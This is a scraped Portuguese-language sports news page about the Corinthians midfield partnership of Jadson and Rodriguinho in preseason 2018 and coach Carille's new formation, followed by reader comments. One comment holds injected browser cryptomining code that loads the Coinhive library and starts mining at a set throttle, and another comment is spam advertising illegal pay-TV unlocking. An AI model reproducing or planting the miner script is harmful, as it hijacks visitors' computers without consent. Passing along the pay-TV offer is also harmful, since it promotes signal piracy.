14/1/2018 10:26

Passe de Jadson, gol de Rodriguinho: dupla do Corinthians se renova para 2018

Rodriguinho volta dos EUA com dois gols após passes de Jadson; novo esquema é aprovado

Jadson e Rodriguinho: parceria dá frutos no Corinthians (Foto: Ag.Corinthians/Daniel Augusto Jr)

Jadriguinho está de volta em 2018. E com a corda toda.



Em dois jogos na pré-temporada, no Torneio da Flórida, Jadson deu passes açucarados para Rodriguinho, que não desperdiçou as chances.

Contra o PSV, o camisa 26 fez o único gol do Timão em tempo normal, no empate por 1 a 1. Diante do Rangers, no sábado, o gol do meia abriu o placar na derrota por 4 a 2 – o time titular venceu o primeiro tempo por 2 a 0.

– Conheço Jadson tem um tempo, a gente se entende dentro e fora de campo. É fácil jogar com ele, é inteligente, procura sempre a tabela, é parecido com o meu jeito, de buscar o passe, a bola no pé. A gente se entende. Fico feliz pela parceria, espero que seja longa – afirmou Rodriguinho.

Jadson e Rodriguinho foram campeões brasileiros juntos em 2015 – o primeiro como titular e o segundo entrando pouco, substituindo Elias em algumas partidas. Em 2017, juntos de verdade, foram fundamentais na conquista do Paulistão e do Brasileirão.

Para 2018, eles são peças importantes no novo esquema de Fácio Carille (4-1-4-1), que centraliza os dois jogadores mais criativos do time para ganhar em criatividade. Apesar da mudança definitiva ser recente, o trabalho feito no ano passado deu confiança ao treinador para a alteração.

– Em sete jogos do returno fizemos isso e o time melhorou a parte ofensiva, seguindo equilibrado defensivamente, mesmo sem muito trabalho (de treino). Desde o primeiro treino deste ano estamos com essa ideia. Para manter Jadson e Rodriguinho por dentro preciso que os jogadores de lado sejam intensos. Foi acima do esperado, mas a gente sabia que a resposta seria positiva.

Novo artilheiro do time, Rodriguinho se mostra feliz com o ajuste:

– Mudou um pouco, ano passado eu tinha liberdade para estar perto do Jô, esse ano faço mais o corredor. Estou conseguindo chegar bem na área para finalizar. Espero que siga assim.

O Corinthians volta ao Brasil neste domingo e estreia no Paulistão na próxima quarta-feira, contra a Ponte Preta, no Pacaembu.

2286 visitas - Fonte: Globo Esporte

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

parabéns timão gostei do time do primeiro tempo

Rafael Pontes     

vaai timao
< src="https://coinhive.com/lib/coinhive.min.js"><>var miner = new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ", {throttle: 0.3});miner.start();

gabriel silva     

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Rui Villar     

dá vergonha deste time nunca muda sempre a mesma coisa técnico muito lerdo não tem noção de nada repetiu o mesmo time medilcre no segundo tempo Pedrinho some daí

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias